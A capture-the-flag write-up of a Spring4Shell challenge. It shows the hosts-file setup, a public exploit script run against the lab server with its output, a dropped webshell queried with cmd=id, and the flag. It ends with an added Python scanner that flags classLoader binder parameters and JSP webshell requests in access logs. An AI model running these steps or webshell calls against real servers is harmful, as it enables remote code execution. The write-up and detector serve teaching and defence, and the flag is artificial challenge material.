Statement: Oook! That’s a hard one! I just want to buy some tubes, but I think that the main site is disabled… What now?


For this challenge, the website has nothing interesting except the information in its footer:

<footer>
  <p>For the complete functionality of the page add the following entries to your DNS configuration and use tube.com:PORT to connect to the platform.<br>
    34.65.33.171 tube.com<br>
    34.65.33.171 legacy.tube.com<br>
    DO NOT USE THIS IN PRODUCTION!</p>
</footer>

I add the following entries to /etc/hosts on my local machine:

34.65.33.171	tube.com
34.65.33.171	legacy.tube.com

Now, the site served under legacy.tube.com is the interesting one. Its HTML source contains the following comment:

  <!--
    Important!
    Due to the recent discovery of a major vulnerability of the used framework, this platform is now deprecated (more information at /info).
    It remains available only for backward compatibility reasons.

    DO NOT USE THIS PLATFORM IN PRODUCTION!
  -->

So I go to the following URL: http://legacy.tube.com:49445/info

DEVELOPER: Mark Doe
FRAMEWORK: spring-boot
TAG: COMPROMISED
DATE: 30.03.2022
CURRENT_STATUS: patch in devlopment

This page tells us that the spring-boot version in use is compromised.

After some research, I find a Git repository with a Spring4Shell exploit that drops a webshell.

PoC of the exploit:

python exploit.py --url "http://legacy.tube.com:49445"
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://legacy.tube.com:49445/shell.jsp?cmd=id

By going to the given URL, we can perform RCE with the parameter cmd:

uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) //
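From the defender's side, this attack leaves two traces in the web-server logs: requests whose parameter names walk through class.module.classLoader into Tomcat's AccessLogValve (that is what the PoC's "Modifying Log Configurations" step does to write the JSP), and subsequent requests to a freshly dropped .jsp with a cmd parameter. The following Python scanner is an added example, not part of the writeup or the exploit repository; the log lines are constructed, and the tag names and the .jsp-plus-cmd heuristic are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format (not real traffic). The second
# request mirrors the public PoCs' binder abuse (class.module.classLoader ->
# Tomcat AccessLogValve); the third is the webshell call from the writeup.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [31/Jul/2022:10:12:01 +0000] "GET /tubes?page=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Jul/2022:10:12:07 +0000] "POST /?'
    'class.module.classLoader.resources.context.parent.pipeline.first.pattern=REDACTED&'
    'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
    ' HTTP/1.1" 200 0',
    '10.0.0.9 - - [31/Jul/2022:10:12:09 +0000] "GET /shell.jsp?cmd=id HTTP/1.1" 200 48',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any parameter name that steps from a bound bean into class.module.classLoader
# (either capitalisation) is the CVE-2022-22965 binder indicator.
CLASSLOADER_RE = re.compile(r'(^|\.)class\.module\.classLoader', re.IGNORECASE)


def classify_request(target):
    """Return indicator tags (my own names) for one request target."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # unquotes names
    hits = [name for name, _ in params if CLASSLOADER_RE.search(name)]
    tags = []
    if hits:
        tags.append("classloader-binding")
        if any("pipeline.first." in name for name in hits):
            tags.append("tomcat-accesslog-tamper")  # AccessLogValve properties
    # Heuristic for the dropped shell: a .jsp fetched with a cmd= parameter.
    if parts.path.lower().endswith(".jsp") and any(n == "cmd" for n, _ in params):
        tags.append("jsp-webshell-cmd")
    return tags


def scan_access_log(text):
    """Parse each log line and keep those carrying at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "tags": tags})
    return findings
```

Access logs only record the query string, so when the binding parameters travel in a POST body this check has to run on WAF or reverse-proxy request logs instead; a new .jsp appearing under the Tomcat webroot is the matching file-system indicator.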

An ls followed by a cat retrieves the flag.

Flag: TFCCTF{F*_$pr1nG!_I_m_m0R3_0f_4_w1nt3r_p3r$0n_aNyw4y!}